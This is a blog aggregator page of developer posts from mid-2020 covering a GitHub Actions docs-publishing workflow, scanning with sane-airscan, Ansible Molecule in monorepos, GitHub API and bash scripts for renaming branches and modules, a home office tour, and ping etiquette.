          python-version: "3.7"
      - name: Install dependencies
        run: make doc-setup
      - name: Build docs
        run: make doc
      - name: commit docs
        run:  
          git checkout gh-pages
          rm -rf $(basename $ GITHUB_REF )
          mv docs/_build/html $(basename $ GITHUB_REF )
          dirname */index.html   sort --version-sort   xargs -I@@ -n1 echo '<div><a href="@@/"><p>@@</p></a></div>' >> index.html
          git add $(basename $ GITHUB_REF ) index.html
          git commit -m "update docs for $(basename $ GITHUB_REF )"   true
      - name: push docs
        run: git push origin gh-pages
As this is not exactly self explanatory:
  1. Configure git to have a proper author name and email, as otherwise you get ugly history and maybe even failing commits
  2. Fetch all branch names, as the checkout action by default doesn't do this.
  3. Setup Python, Sphinx, Ansible etc.
  4. Build the documentation as described above.
  5. Switch to the gh-pages branch from the commit that triggered the workflow.
  6. Remove any existing documentation for this tag/branch ($GITHUB_REF contains the name which triggered the workflow) if it exists already.
  7. Move the previously built documentation from the Sphinx output directory to a directory named after the current target.
  8. Generate a simple index of all available documentation versions.
  9. Commit all changes, but don't fail if there is nothing to commit.
  10. Push to the gh-pages branch which will trigger a GitHub Pages deployment.
Pretty sure this won't win any beauty contest for scripting and automation, but it gets the job done and nobody on the team has to remember to update the documentation anymore. You can see the results on theforeman.org or directly on GitHub.

15 July 2020

Evgeni Golov: Scanning with a Brother MFC-L2720DW on Linux without any binary blobs

Back in 2015, I've got a Brother MFC-L2720DW for the casual "I need to print those two pages" and "I need to scan these receipts" at home (and home-office ;)). It's a rather cheap (I paid less than 200 in 2015) monochrome laser printer, scanner and fax with a (well, two, wired and wireless) network interface. In those five years I've never used the fax or WiFi functions, but printed a scanned a few pages. Brother offers Linux drivers, but those are binary blobs which I never really liked to run. The printer part works just fine with a "Generic PCL 6/PCL XL" driver in CUPS or even "driverless" via AirPrint on Linux. You can also feed it plain PostScript, but I found it rather slow compared to PCL. On recent Androids it works using the built in printer service or Mopria Printer Service for older ones - I used to joke "why would you need a printer on your phone?!", but found it quite useful after a few tries. However, for the scanner part I had to use Brother's brscan4 driver on Linux and their iPrint&Scan app on Android - Mopria Scan wouldn't support it. Until, last Friday, I've seen a NEW package being uploaded to Debian: sane-airscan. And yes, monitoring the Debian NEW queue via Twitter is totally legit! sane-airscan is an implementation of Apple's AirScan (eSCL) and Microsoft's WSD/WS-Scan protocols for SANE. I've never heard of those before - only about AirPrint, but thankfully this does not mean nobody has reverse-engineered them and created something that works beautifully on Linux. As of today there are no packages in the official Fedora repositories and the Debian ones are still in NEW, however the upstream documentation refers to an openSUSE OBS repository that works like a charm in the meantime (on Fedora 32). The only drawback I've seen so far: the scanner only works in "Color" mode and there is no way to scan in "Grayscale", making scanning a tad slower. This has been reported upstream and might or might not be fixable, as it seems the device does not announce any mode besides "Color". Interestingly, SANE has an eSCL backend on its own since 1.0.29, but it's disabled in Fedora in favor of sane-airscan even though the later isn't available in Fedora yet. However, it might not even need separate packaging, as SANE upstream is planning to integrate it into sane-backends directly.

12 July 2020

Evgeni Golov: Using Ansible Molecule to test roles in monorepos

Ansible Molecule is a toolkit for testing Ansible roles. It allows for easy execution and verification of your roles and also manages the environment (container, VM, etc) in which those are executed. In the Foreman project we have a collection of Ansible roles to setup Foreman instances called forklift. The roles vary from configuring Libvirt and Vagrant for our CI to deploying full fledged Foreman and Katello setups with Proxies and everything. The repository also contains a dynamic Vagrant file that can generate Foreman and Katello installations on all supported Debian, Ubuntu and CentOS platforms using the previously mentioned roles. This feature is super helpful when you need to debug something specific to an OS/version combination. Up until recently, all those roles didn't have any tests. We would run ansible-lint on them, but that was it. As I am planning to do some heavier work on some of the roles to enhance our upgrade testing, I decided to add some tests first. Using Molecule, of course. Adding Molecule to an existing role is easy: molecule init scenario -r my-role-name will add all the necessary files/examples for you. It's left as an exercise to the reader how to actually test the role properly as this is not what this post is about. Executing the tests with Molecule is also easy: molecule test. And there are also examples how to integrate the test execution with the common CI systems. But what happens if you have more than one role in the repository? Molecule has support for monorepos, however that is rather limited: it will detect the role path correctly, so roles can depend on other roles from the same repository, but it won't find and execute tests for roles if you run it from the repository root. There is an undocumented way to set MOLECULE_GLOB so that Molecule would detect test scenarios in different paths, but I couldn't get it to work nicely for executing tests of multiple roles and upstream currently does not plan to implement this. Well, bash to the rescue!
for roledir in roles/*/molecule; do
    pushd $(dirname $roledir)
    molecule test
    popd
done
Add that to your CI and be happy! The CI will execute all available tests and you can still execute those for the role you're hacking on by just calling molecule test as you're used to. However, we can do even better. When you initialize a role with Molecule or add Molecule to an existing role, there are quite a lot of files added in the molecule directory plus an yamllint configuration in the role root. If you have many roles, you will notice that especially the molecule.yml and .yamllint files look very similar for each role. It would be much nicer if we could keep those in a shared place. Molecule supports a "base config": a configuration file that gets merged with the molecule.yml of your project. By default, that's ~/.config/molecule/config.yml, but Molecule will actually look for a .config/molecule/config.yml in two places: the root of the VCS repository and your HOME. And guess what? The one in the repository wins (that's not yet well documented). So by adding a .config/molecule/config.yml to the repository, we can place all shared configuration there and don't have to duplicate it in every role. And that .yamllint file? We can also move that to the repository root and add the following to Molecule's (now shared) configuration:
lint: yamllint --config-file $ MOLECULE_PROJECT_DIRECTORY /../../.yamllint --format parsable .
This will define the lint action as calling yamllint with the configuration stored in the repository root instead of the project directory, assuming you store your roles as roles/<rolename>/ in the repository. And that's it. We now have a central place for our Molecule and yamllint configurations and only need to place role-specific data into the role directory.

2 July 2020

Evgeni Golov: Automatically renaming the default git branch to "devel"

It seems GitHub is planning to rename the default brach for newly created repositories from "master" to "main". It's incredible how much positive PR you can get with a one line configuration change, while still working together with the ICE. However, this post is not about bashing GitHub. Changing the default branch for newly created repositories is good. And you also should do that for the ones you create with git init locally. But what about all the repositories out there? GitHub surely won't force-rename those branches, but we can! Ian will do this as he touches the individual repositories, but I tend to forget things unless I do them immediately Oh, so this is another "automate everything with an API" post? Yes, yes it is! And yes, I am going to use GitHub here, but something similar should be implementable on any git hosting platform that has an API. Of course, if you have SSH access to the repositories, you can also just edit HEAD in an for loop in bash, but that would be boring ;-) I'm going with devel btw, as I'm already used to develop in the Foreman project and devel in Ansible. acquire credentials My GitHub account is 2FA enabled, so I can't just use my username and password in a basic HTTP API client. So the first step is to acquire a personal access token, that can be used instead. Of course I could also have implemented OAuth2 in my lousy script, but ain't nobody have time for that. The token will require the "repo" permission to be able to change repositories. And we'll need some boilerplate code (I'm using Python3 and requests, but anything else will work too):
#!/usr/bin/env python3
import requests
BASE='https://api.github.com'
USER='evgeni'
TOKEN='abcdef'
headers =  'User-Agent': '@ '.format(USER) 
auth = (USER, TOKEN)
session = requests.Session()
session.auth = auth
session.headers.update(headers)
session.verify = True
This will store our username, token, and create a requests.Session so that we don't have to pass the same data all the time. get a list of repositories to change I want to change all my own repos that are not archived, not forks, and actually have the default branch set to master, YMMV. As we're authenticated, we can just list the repositories of the currently authenticated user, and limit them to "owner" only. GitHub uses pagination for their API, so we'll have to loop until we get to the end of the repository list.
repos_to_change = []
url = ' /user/repos?type=owner'.format(BASE)
while url:
    r = session.get(url)
    if r.ok:
        repos = r.json()
        for repo in repos:
            if not repo['archived'] and not repo['fork'] and repo['default_branch'] == 'master':
                repos_to_change.append(repo['name'])
        if 'next' in r.links:
            url = r.links['next']['url']
        else:
            url = None
    else:
        url = None
create a new devel branch and mark it as default Now that we know which repos to change, we need to fetch the SHA of the current master, create a new devel branch pointing at the same commit and then set that new branch as the default branch.
for repo in repos_to_change:
    master_data = session.get(' /repos/evgeni/ /git/ref/heads/master'.format(BASE, repo)).json()
    data =  'ref': 'refs/heads/devel', 'sha': master_data['object']['sha'] 
    session.post(' /repos/ / /git/refs'.format(BASE, USER, repo), json=data)
    default_branch_data =  'default_branch': 'devel' 
    session.patch(' /repos/ / '.format(BASE, USER, repo), json=default_branch_data)
    session.delete(' /repos/ / /git/refs/heads/ '.format(BASE, USER, repo, 'master'))
I've also opted in to actually delete the old master, as I think that's the safest way to let the users know that it's gone. Letting it rot in the repository would mean people can still pull and won't notice that there are no changes anymore as the default branch moved to devel. So announcement I've updated all my (those in the evgeni namespace) non-archived repositories to have devel instead of master as the default branch. Have fun updating! code
#!/usr/bin/env python3
import requests
BASE='https://api.github.com'
USER='evgeni'
TOKEN='abcd'
headers =  'User-Agent': '@ '.format(USER) 
auth = (USER, TOKEN)
session = requests.Session()
session.auth = auth
session.headers.update(headers)
session.verify = True
repos_to_change = []
url = ' /user/repos?type=owner'.format(BASE)
while url:
    r = session.get(url)
    if r.ok:
        repos = r.json()
        for repo in repos:
            if not repo['archived'] and not repo['fork'] and repo['default_branch'] == 'master':
                repos_to_change.append(repo['name'])
        if 'next' in r.links:
            url = r.links['next']['url']
        else:
            url = None
    else:
        url = None
for repo in repos_to_change:
    master_data = session.get(' /repos/evgeni/ /git/ref/heads/master'.format(BASE, repo)).json()
    data =  'ref': 'refs/heads/devel', 'sha': master_data['object']['sha'] 
    session.post(' /repos/ / /git/refs'.format(BASE, USER, repo), json=data)
    default_branch_data =  'default_branch': 'devel' 
    session.patch(' /repos/ / '.format(BASE, USER, repo), json=default_branch_data)
    session.delete(' /repos/ / /git/refs/heads/ '.format(BASE, USER, repo, 'master'))

26 June 2020

Jonathan Dowland: Our Study

This is a fairly self-indulgent post, sorry! Encouraged by Evgeni, Michael and others, given I'm spending a lot more time at my desk in my home office, here's a picture of it:
Fisheye shot of my home office Fisheye shot of my home office
Near enough everything in the study is a work in progress. The KALLAX behind my desk is a recent addition (under duress) because we have nowhere else to put it. Sadly I can't see it going away any time soon. On the up-side, since Christmas I've had my record player and collection in and on top of it, so I can listen to records whilst working. The arm chair is a recent move from another room. It's a nice place to take some work calls, serving as a change of scene, and I hope to add a reading light sometime. The desk chair is some Ikea model I can't recall, which is sufficient, and just fits into the desk cavity. (I'm fairly sure my Aeron, inaccessible elsewhere, would not fit.) I've had this old mahogany, leather-topped desk since I was a teenager and it's a blessing and a curse. Mostly a blessing: It's a lovely big desk. The main drawback is it's very much not height adjustable. At the back is a custom made, full-width monitor stand/shelf, a recent gift produced to specification by my Dad, a retired carpenter. On the top: my work Thinkpad T470s laptop, geared more towards portable than powerful (my normal preference), although for the forseeable future it's going to remain in the exact same place; an Ikea desk lamp (I can't recall the model); a 27" 4K LG monitor, the cheapest such I could find when I bought it; an old LCD Analog TV, fantastic for vintage consoles and the like. Underneath: An Alesis Micron 2 octave analog-modelling synthesizer; various hubs and similar things; My Amiga 500. Like Evgeni, my normal keyboard is a ThinkPad Compact USB Keyboard with TrackPoint. I've been using different generations of these styles of keyboards for a long time now, initially because I loved the trackpoint pointer. I'm very curious about trying out mechanical keyboards, as I have very fond memories of my first IBM Model M buckled-spring keyboard, but I haven't dipped my toes into that money-trap just yet. The Thinkpad keyboard is rubber-dome, but it's a good one. Wedged between the right-hand bookcases are a stack of IT-related things: new printer; deprecated printer; old/spare/play laptops, docks and chargers; managed network switch; NAS.

22 June 2020

Evgeni Golov: mass-migrating modules inside an Ansible Collection

Im the Foreman project, we've been maintaining a collection of Ansible modules to manage Foreman installations since 2017. That is, 2 years before Ansible had the concept of collections at all. For that you had to set library (and later module_utils and doc_fragment_plugins) in ansible.cfg and effectively inject our modules, their helpers and documentation fragments into the main Ansible namespace. Not the cleanest solution, but it worked quiet well for us. When Ansible started introducing Collections, we quickly joined, as the idea of namespaced, easily distributable and usable content units was great and exactly matched what we had in mind. However, collections are only usable in Ansible 2.8, or actually 2.9 as 2.8 can consume them, but tooling around building and installing them is lacking. Because of that we've been keeping our modules usable outside of a collection. Until recently, when we decided it's time to move on, drop that compatibility (which costed a few headaches over the time) and release a shiny 1.0.0. One of the changes we wanted for 1.0.0 is renaming a few modules. Historically we had the module names prefixed with foreman_ and katello_, depending whether they were designed to work with Foreman (and plugins) or Katello (which is technically a Foreman plugin, but has a way more complicated deployment and currently can't be easily added to an existing Foreman setup). This made sense as long as we were injecting into the main Ansible namespace, but with collections the names be became theforemam.foreman.foreman_ <something> and while we all love Foreman, that was a bit too much. So we wanted to drop that prefix. And while at it, also change some other names (like ptable, which became partition_table) to be more readable. But how? There is no tooling that would rename all files accordingly, adjust examples and tests. Well, bash to the rescue! I'm usually not a big fan of bash scripts, but renaming files, searching and replacing strings? That perfectly fits! First of all we need a way map the old name to the new name. In most cases it's just "drop the prefix", for the others you can have some if/elif/fi:
prefixless_name=$(echo $ old_name   sed -E 's/^(foreman katello)_//')
if [[ $ old_name  == 'foreman_environment' ]]; then
  new_name='puppet_environment'
elif [[ $ old_name  == 'katello_sync' ]]; then
  new_name='repository_sync'
elif [[ $ old_name  == 'katello_upload' ]]; then
  new_name='content_upload'
elif [[ $ old_name  == 'foreman_ptable' ]]; then
  new_name='partition_table'
elif [[ $ old_name  == 'foreman_search_facts' ]]; then
  new_name='resource_info'
elif [[ $ old_name  == 'katello_manifest' ]]; then
  new_name='subscription_manifest'
elif [[ $ old_name  == 'foreman_model' ]]; then
  new_name='hardware_model'
else
  new_name=$ prefixless_name 
fi
That defined, we need to actually have a $ old_name . Well, that's a for loop over the modules, right?
for module in $ BASE /foreman_*py $ BASE /katello_*py; do
  old_name=$(basename $ module  .py)
   
done
While we're looping over files, let's rename them and all the files that are associated with the module:
# rename the module
git mv $ BASE /$ old_name .py $ BASE /$ new_name .py
# rename the tests and test fixtures
git mv $ TESTS /$ old_name .yml $ TESTS /$ new_name .yml
git mv tests/fixtures/apidoc/$ old_name .json tests/fixtures/apidoc/$ new_name .json
for testfile in $ TESTS /fixtures/$ old_name -*.yml; do
  git mv $ testfile  $(echo $ testfile   sed "s/$ old_name /$ new_name /")
done
Now comes the really tricky part: search and replace. Let's see where we need to replace first:
  1. in the module file
    1. module key of the DOCUMENTATION stanza (e.g. module: foreman_example)
    2. all examples (e.g. foreman_example: )
  2. in all test playbooks (e.g. foreman_example: )
  3. in pytest's conftest.py and other files related to test execution
  4. in documentation
sed -E -i "/^(\s+$ old_name  module):/ s/$ old_name /$ new_name /g" $ BASE /*.py
sed -E -i "/^(\s+$ old_name  module):/ s/$ old_name /$ new_name /g" tests/test_playbooks/tasks/*.yml tests/test_playbooks/*.yml
sed -E -i "/'$ old_name '/ s/$ old_name /$ new_name /" tests/conftest.py tests/test_crud.py
sed -E -i "/ $ old_name  / s/$ old_name /$ new_name /g' README.md docs/*.md
You've probably noticed I used $ BASE and $ TESTS and never defined them Lazy me. But here is the full script, defining the variables and looping over all the modules.
#!/bin/bash
BASE=plugins/modules
TESTS=tests/test_playbooks
RUNTIME=meta/runtime.yml
echo "plugin_routing:" > $ RUNTIME 
echo "  modules:" >> $ RUNTIME 
for module in $ BASE /foreman_*py $ BASE /katello_*py; do
  old_name=$(basename $ module  .py)
  prefixless_name=$(echo $ old_name   sed -E 's/^(foreman katello)_//')
  if [[ $ old_name  == 'foreman_environment' ]]; then
    new_name='puppet_environment'
  elif [[ $ old_name  == 'katello_sync' ]]; then
    new_name='repository_sync'
  elif [[ $ old_name  == 'katello_upload' ]]; then
    new_name='content_upload'
  elif [[ $ old_name  == 'foreman_ptable' ]]; then
    new_name='partition_table'
  elif [[ $ old_name  == 'foreman_search_facts' ]]; then
    new_name='resource_info'
  elif [[ $ old_name  == 'katello_manifest' ]]; then
    new_name='subscription_manifest'
  elif [[ $ old_name  == 'foreman_model' ]]; then
    new_name='hardware_model'
  else
    new_name=$ prefixless_name 
  fi
  echo "renaming $ old_name  to $ new_name "
  git mv $ BASE /$ old_name .py $ BASE /$ new_name .py
  git mv $ TESTS /$ old_name .yml $ TESTS /$ new_name .yml
  git mv tests/fixtures/apidoc/$ old_name .json tests/fixtures/apidoc/$ new_name .json
  for testfile in $ TESTS /fixtures/$ old_name -*.yml; do
    git mv $ testfile  $(echo $ testfile   sed "s/$ old_name /$ new_name /")
  done
  sed -E -i "/^(\s+$ old_name  module):/ s/$ old_name /$ new_name /g" $ BASE /*.py
  sed -E -i "/^(\s+$ old_name  module):/ s/$ old_name /$ new_name /g" tests/test_playbooks/tasks/*.yml tests/test_playbooks/*.yml
  sed -E -i "/'$ old_name '/ s/$ old_name /$ new_name /" tests/conftest.py tests/test_crud.py
  sed -E -i "/ $ old_name  / s/$ old_name /$ new_name /g' README.md docs/*.md
  echo "    $ old_name :" >> $ RUNTIME 
  echo "      redirect: $ new_name " >> $ RUNTIME 
  git commit -m "rename $ old_name  to $ new_name " $ BASE  tests/ README.md docs/ $ RUNTIME 
done
As a bonus, the script will also generate a meta/runtime.yml which can be used by Ansible 2.10+ to automatically use the new module names if the playbook contains the old ones. Oh, and yes, this is probably not the nicest script you'll read this year. Maybe not even today. But it got the job nicely done and I don't intend to need it again anyways.

14 June 2020

Evgeni Golov: naked pings 2020

ajax' post about "ping" etiquette is over 10 years old, but holds true until this day. So true, that my IRC client at work has a script, that will reply with a link to it each time I get a naked ping. But IRC is not the only means of communication. There is also mail, (video) conferencing, and GitHub/GitLab. Well, at least in the software engineering context. Oh and yes, it's 2020 and I still (proudly) have no Slack account. Thankfully, (naked) pings are not really a thing for mail or conferencing, but I see an increasing amount of them on GitHub and it bothers me, a lot. As there is no direct messaging on GitHub, you might rightfully ask why, as there is always context in form of the issue or PR the ping happened in, so lean back an listen ;-) notifications become useless While there might be context in the issue/PR, there is none (besides the title) in the notification mail, and not even the title in the notification from the Android app (which I have installed as I use it lot for smaller reviews). So the ping will always force a full context switch to open the web view of the issue in question, removing the possibility to just swipe away the notification/mail as "not important right now". even some context is not enough context Even after visiting the issue/PR, the ping quite often remains non-actionable. Do you want me to debug/fix the issue? Review the PR? Merge it? Close it? I don't know! The only actionable ping is when the previous message is directed at me and has an actionable request in it and the ping is just a reminder that I have to do it. And even then, why not write "hey @evgeni, did you have time to process my last question?" or something similar? BTW, this is also what I dislike about ajax' minimal example "ping re bz 534027" - what am I supposed to do with that BZ?! why me anyways?! Unless I am the only maintainer of a repo or the author of the issue/PR, there is usually no reason to ping me directly. I might be sick, or on holiday, or currently not working on that particular repo/topic or whatever. Any of that will result in you thinking that your request will be prioritized, while in reality it won't. Even worse, somebody might come across it, see me mentioned and think "ok, that's Evgeni's playground, I'll look elsewhere". Most organizations have groups of people working on specific topics. If you know the group name and have enough permissions (I am not exactly sure which, just that GitHub have limits to avoid spam, sorry) you can ping @organization/group and everyone in that group will get a notification. That's far from perfect, but at least this will get the attention of the right people. Sometimes there is also a bot that will either automatically ping a group of people or you can trigger to do so. Oh, and I'm getting paid for work on open source. So if you end up pinging me in a work-related repository, there is a high chance I will only process that during work hours, while another co-worker might have been available to help you out almost immediately. be patient Unless we talked on another medium before and I am waiting for it, please don't ping directly after creation of the issue/PR. Maintainers get notifications about new stuff and will triage and process it at some point. conclusion If you feel called out, please don't take it personally. Instead, please try to provide as much actionable information as possible and be patient, that's the best way to get a high quality result. I will ignore pings where I don't immediately know what to do, and so should you. one more thing Oh, and if you ping me on IRC, with context, and then disconnect before I can respond In the past you would sometimes get a reply by mail. These days the request will be most probably ignored. I don't like talking to the void. Sorry.

Next.